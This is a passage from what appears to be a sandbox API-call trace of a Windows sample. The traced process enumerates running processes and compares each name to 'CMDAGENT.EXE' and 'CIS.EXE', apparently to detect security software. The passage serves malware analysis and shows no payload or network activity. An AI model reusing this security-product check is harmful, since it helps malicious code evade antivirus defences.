th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="english_performing.exe")) returned 1 [0163.167] lstrcpyW (in: lpString1=0x18f6dc, lpString2="english_performing.exe" | out: lpString1="english_performing.exe") returned="english_performing.exe" [0163.167] lstrlenW (lpString="english_performing.exe") returned 22 [0163.167] CharUpperBuffW (in: lpsz="english_performing.exe", cchLength=0x16 | out: lpsz="ENGLISH_PERFORMING.EXE") returned 0x16 [0163.167] lstrcmpW (lpString1="ENGLISH_PERFORMING.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.167] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="laptop-tattoo.exe")) returned 1 [0163.167] lstrcpyW (in: lpString1=0x18f6dc, 
lpString2="laptop-tattoo.exe" | out: lpString1="laptop-tattoo.exe") returned="laptop-tattoo.exe" [0163.167] lstrlenW (lpString="laptop-tattoo.exe") returned 17 [0163.167] CharUpperBuffW (in: lpsz="laptop-tattoo.exe", cchLength=0x11 | out: lpsz="LAPTOP-TATTOO.EXE") returned 0x11 [0163.167] lstrcmpW (lpString1="LAPTOP-TATTOO.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.167] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="c-weird-baskets.exe")) returned 1 [0163.168] lstrcpyW (in: lpString1=0x18f6dc, lpString2="c-weird-baskets.exe" | out: lpString1="c-weird-baskets.exe") returned="c-weird-baskets.exe" [0163.168] lstrlenW (lpString="c-weird-baskets.exe") returned 19 [0163.168] CharUpperBuffW (in: lpsz="c-weird-baskets.exe", cchLength=0x13 | out: lpsz="C-WEIRD-BASKETS.EXE") returned 0x13 [0163.168] lstrcmpW (lpString1="C-WEIRD-BASKETS.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.168] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="volume.exe")) returned 1 [0163.169] lstrcpyW (in: lpString1=0x18f6dc, lpString2="volume.exe" | out: lpString1="volume.exe") returned="volume.exe" [0163.169] lstrlenW (lpString="volume.exe") returned 10 [0163.169] CharUpperBuffW (in: lpsz="volume.exe", cchLength=0xa | out: lpsz="VOLUME.EXE") returned 0xa [0163.169] lstrcmpW (lpString1="VOLUME.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.169] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="rich-zealand.exe")) returned 1 [0163.170] lstrcpyW (in: lpString1=0x18f6dc, lpString2="rich-zealand.exe" | out: lpString1="rich-zealand.exe") returned="rich-zealand.exe" [0163.170] lstrlenW (lpString="rich-zealand.exe") returned 16 [0163.170] CharUpperBuffW (in: lpsz="rich-zealand.exe", cchLength=0x10 | out: lpsz="RICH-ZEALAND.EXE") returned 0x10 [0163.170] lstrcmpW (lpString1="RICH-ZEALAND.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.170] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="objectives-bailey-audit.exe")) returned 1 [0163.170] lstrcpyW (in: lpString1=0x18f6dc, lpString2="objectives-bailey-audit.exe" | out: lpString1="objectives-bailey-audit.exe") returned="objectives-bailey-audit.exe" [0163.170] lstrlenW (lpString="objectives-bailey-audit.exe") returned 27 [0163.171] CharUpperBuffW (in: lpsz="objectives-bailey-audit.exe", cchLength=0x1b | out: lpsz="OBJECTIVES-BAILEY-AUDIT.EXE") returned 0x1b [0163.171] lstrcmpW (lpString1="OBJECTIVES-BAILEY-AUDIT.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.171] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="puzzle-fcc-tuesday.exe")) returned 1 [0163.171] lstrcpyW (in: lpString1=0x18f6dc, lpString2="puzzle-fcc-tuesday.exe" | out: lpString1="puzzle-fcc-tuesday.exe") returned="puzzle-fcc-tuesday.exe" [0163.171] lstrlenW (lpString="puzzle-fcc-tuesday.exe") returned 22 [0163.171] CharUpperBuffW (in: lpsz="puzzle-fcc-tuesday.exe", cchLength=0x16 | out: lpsz="PUZZLE-FCC-TUESDAY.EXE") returned 0x16 [0163.171] lstrcmpW (lpString1="PUZZLE-FCC-TUESDAY.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.171] Process32NextW 
(in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x690, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="sayconvenience.exe")) returned 1 [0163.183] lstrcpyW (in: lpString1=0x18f6dc, lpString2="sayconvenience.exe" | out: lpString1="sayconvenience.exe") returned="sayconvenience.exe" [0163.183] lstrlenW (lpString="sayconvenience.exe") returned 18 [0163.183] CharUpperBuffW (in: lpsz="sayconvenience.exe", cchLength=0x12 | out: lpsz="SAYCONVENIENCE.EXE") returned 0x12 [0163.183] lstrcmpW (lpString1="SAYCONVENIENCE.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.183] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="psychology-leaving-examinations.exe")) returned 1 [0163.201] lstrcpyW (in: lpString1=0x18f6dc, lpString2="psychology-leaving-examinations.exe" | out: lpString1="psychology-leaving-examinations.exe") returned="psychology-leaving-examinations.exe" [0163.201] lstrlenW (lpString="psychology-leaving-examinations.exe") returned 35 [0163.201] CharUpperBuffW (in: lpsz="psychology-leaving-examinations.exe", cchLength=0x23 | out: lpsz="PSYCHOLOGY-LEAVING-EXAMINATIONS.EXE") returned 0x23 [0163.201] lstrcmpW (lpString1="PSYCHOLOGY-LEAVING-EXAMINATIONS.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.201] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="EXCEL.EXE")) returned 1 [0163.201] lstrcpyW (in: lpString1=0x18f6dc, lpString2="EXCEL.EXE" | out: lpString1="EXCEL.EXE") returned="EXCEL.EXE" [0163.201] lstrlenW (lpString="EXCEL.EXE") returned 9 [0163.201] 
CharUpperBuffW (in: lpsz="EXCEL.EXE", cchLength=0x9 | out: lpsz="EXCEL.EXE") returned 0x9 [0163.201] lstrcmpW (lpString1="EXCEL.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.202] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.202] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.202] lstrlenW (lpString="svchost.exe") returned 11 [0163.202] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.202] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.202] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0163.203] lstrcpyW (in: lpString1=0x18f6dc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0163.203] lstrlenW (lpString="sppsvc.exe") returned 10 [0163.203] CharUpperBuffW (in: lpsz="sppsvc.exe", cchLength=0xa | out: lpsz="SPPSVC.EXE") returned 0xa [0163.203] lstrcmpW (lpString1="SPPSVC.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.203] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0163.204] lstrcpyW (in: lpString1=0x18f6dc, lpString2="OSPPSVC.EXE" | out: lpString1="OSPPSVC.EXE") returned="OSPPSVC.EXE" [0163.204] lstrlenW (lpString="OSPPSVC.EXE") returned 11 [0163.204] CharUpperBuffW (in: lpsz="OSPPSVC.EXE", cchLength=0xb 
| out: lpsz="OSPPSVC.EXE") returned 0xb [0163.204] lstrcmpW (lpString1="OSPPSVC.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.204] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.204] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.204] lstrlenW (lpString="svchost.exe") returned 11 [0163.204] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.205] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.205] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.205] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.205] lstrlenW (lpString="svchost.exe") returned 11 [0163.205] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.205] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.205] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x890, pcPriClassBase=8, dwFlags=0x0, szExeFile="winpoint.exe")) returned 1 [0163.206] lstrcpyW (in: lpString1=0x18f6dc, lpString2="winpoint.exe" | out: lpString1="winpoint.exe") returned="winpoint.exe" [0163.206] lstrlenW (lpString="winpoint.exe") returned 12 [0163.206] CharUpperBuffW (in: lpsz="winpoint.exe", cchLength=0xc | out: lpsz="WINPOINT.EXE") 
returned 0xc [0163.206] lstrcmpW (lpString1="WINPOINT.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.206] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0163.207] lstrcpyW (in: lpString1=0x18f6dc, lpString2="cmd.exe" | out: lpString1="cmd.exe") returned="cmd.exe" [0163.207] lstrlenW (lpString="cmd.exe") returned 7 [0163.207] CharUpperBuffW (in: lpsz="cmd.exe", cchLength=0x7 | out: lpsz="CMD.EXE") returned 0x7 [0163.207] lstrcmpW (lpString1="CMD.EXE", lpString2="CMDAGENT.EXE") returned -1 [0163.207] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0163.207] lstrcpyW (in: lpString1=0x18f6dc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0163.207] lstrlenW (lpString="conhost.exe") returned 11 [0163.207] CharUpperBuffW (in: lpsz="conhost.exe", cchLength=0xb | out: lpsz="CONHOST.EXE") returned 0xb [0163.208] lstrcmpW (lpString1="CONHOST.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.208] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0163.208] lstrcpyW (in: lpString1=0x18f6dc, lpString2="PING.EXE" | out: lpString1="PING.EXE") returned="PING.EXE" [0163.208] lstrlenW (lpString="PING.EXE") returned 8 [0163.208] CharUpperBuffW (in: lpsz="PING.EXE", cchLength=0x8 | out: lpsz="PING.EXE") returned 0x8 [0163.208] lstrcmpW (lpString1="PING.EXE", lpString2="CMDAGENT.EXE") returned 1 
[0163.208] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 0 [0163.209] CloseHandle (hObject=0xe0) returned 1 [0163.209] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe0 [0163.211] lstrcpyW (in: lpString1=0x18f8e4, lpString2="CIS.EXE" | out: lpString1="CIS.EXE") returned="CIS.EXE" [0163.211] lstrlenW (lpString="CIS.EXE") returned 7 [0163.211] CharUpperBuffW (in: lpsz="CIS.EXE", cchLength=0x7 | out: lpsz="CIS.EXE") returned 0x7 [0163.211] Process32FirstW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.211] lstrcpyW (in: lpString1=0x18f6dc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0163.212] lstrlenW (lpString="[System Process]") returned 16 [0163.212] CharUpperBuffW (in: lpsz="[System Process]", cchLength=0x10 | out: lpsz="[SYSTEM PROCESS]") returned 0x10 [0163.212] lstrcmpW (lpString1="[SYSTEM PROCESS]", lpString2="CIS.EXE") returned -1 [0163.212] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0163.212] lstrcpyW (in: lpString1=0x18f6dc, lpString2="System" | out: lpString1="System") returned="System" [0163.212] lstrlenW (lpString="System") returned 6 [0163.212] CharUpperBuffW (in: lpsz="System", cchLength=0x6 | out: lpsz="SYSTEM") returned 0x6 [0163.212] lstrcmpW (lpString1="SYSTEM", lpString2="CIS.EXE") returned 1 [0163.212] Process32NextW (in: 
hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0163.213] lstrcpyW (in: lpString1=0x18f6dc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0163.213] lstrlenW (lpString="smss.exe") returned 8 [0163.213] CharUpperBuffW (in: lpsz="smss.exe", cchLength=0x8 | out: lpsz="SMSS.EXE") returned 0x8 [0163.213] lstrcmpW (lpString1="SMSS.EXE", lpString2="CIS.EXE") returned 1 [0163.213] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.214] lstrcpyW (in: lpString1=0x18f6dc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0163.214] lstrlenW (lpString="csrss.exe") returned 9 [0163.214] CharUpperBuffW (in: lpsz="csrss.exe", cchLength=0x9 | out: lpsz="CSRSS.EXE") returned 0x9 [0163.214] lstrcmpW (lpString1="CSRSS.EXE", lpString2="CIS.EXE") returned 1 [0163.214] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0163.214] lstrcpyW (in: lpString1=0x18f6dc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0163.215] lstrlenW (lpString="wininit.exe") returned 11 [0163.215] CharUpperBuffW (in: lpsz="wininit.exe", cchLength=0xb | out: lpsz="WININIT.EXE") returned 0xb [0163.215] lstrcmpW (lpString1="WININIT.EXE", lpString2="CIS.EXE") returned 1 [0163.215] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.215] lstrcpyW (in: lpString1=0x18f6dc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0163.215] lstrlenW (lpString="csrss.exe") returned 9 [0163.215] CharUpperBuffW (in: lpsz="csrss.exe", cchLength=0x9 | out: lpsz="CSRSS.EXE") returned 0x9 [0163.215] lstrcmpW (lpString1="CSRSS.EXE", lpString2="CIS.EXE") returned 1 [0163.215] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0163.216] lstrcpyW (in: lpString1=0x18f6dc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0163.216] lstrlenW (lpString="winlogon.exe") returned 12 [0163.216] CharUpperBuffW (in: lpsz="winlogon.exe", cchLength=0xc | out: lpsz="WINLOGON.EXE") returned 0xc [0163.216] lstrcmpW (lpString1="WINLOGON.EXE", lpString2="CIS.EXE") returned 1 [0163.216] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0163.217] lstrcpyW (in: lpString1=0x18f6dc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0163.217] lstrlenW (lpString="services.exe") returned 12 [0163.217] CharUpperBuffW (in: lpsz="services.exe", cchLength=0xc | out: lpsz="SERVICES.EXE") returned 0xc [0163.217] lstrcmpW (lpString1="SERVICES.EXE", lpString2="CIS.EXE") returned 1 [0163.217] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, 
th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0163.218] lstrcpyW (in: lpString1=0x18f6dc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0163.218] lstrlenW (lpString="lsass.exe") returned 9 [0163.218] CharUpperBuffW (in: lpsz="lsass.exe", cchLength=0x9 | out: lpsz="LSASS.EXE") returned 0x9 [0163.218] lstrcmpW (lpString1="LSASS.EXE", lpString2="CIS.EXE") returned 1 [0163.218] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0163.218] lstrcpyW (in: lpString1=0x18f6dc, lpString2="lsm.exe" | out: lpString1="lsm.exe") returned="lsm.exe" [0163.218] lstrlenW (lpString="lsm.exe") returned 7 [0163.218] CharUpperBuffW (in: lpsz="lsm.exe", cchLength=0x7 | out: lpsz="LSM.EXE") returned 0x7 [0163.218] lstrcmpW (lpString1="LSM.EXE", lpString2="CIS.EXE") returned 1 [0163.218] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.219] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.219] lstrlenW (lpString="svchost.exe") returned 11 [0163.219] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.219] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="CIS.EXE") returned 1 [0163.219] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0163.220] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.220] lstrlenW (lpString="svchost.exe") returned 11 [0163.220] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.220] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="CIS.EXE") returned 1 [0163.220] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.221] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.221] lstrlenW (lpString="svchost.exe") returned 11 [0163.221] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.221] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="CIS.EXE") returned 1 [0163.221] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.221] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.221] lstrlenW (lpString="svchost.exe") returned 11 [0163.221] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.222] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="CIS.EXE") returned 1 [0163.222] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.222] 
lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.222] lstrlenW (lpString="svchost.exe") returned 11 [0163.222] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.222] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="CIS.EXE") returned 1 [0163.222] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0163.223] lstrcpyW (in: lpString1=0x18f6dc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0163.223] lstrlenW (lpString="audiodg.exe") returned 11 [0163.223] CharUpperBuffW (in: lpsz="audiodg.exe", cchLength=0xb | out: lpsz="AUDIODG.EXE") returned 0xb [0163.223] lstrcmpW (lpString1="AUDIODG.EXE", lpString2="CIS.EXE") returned -1 [0163.223] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.224] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.224] lstrlenW (lpString="svchost.exe") returned 11 [0163.224] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.224] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="CIS.EXE") returned 1 [0163.224] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.224] lstrcpyW (in: lpString1=0x18f6dc, 
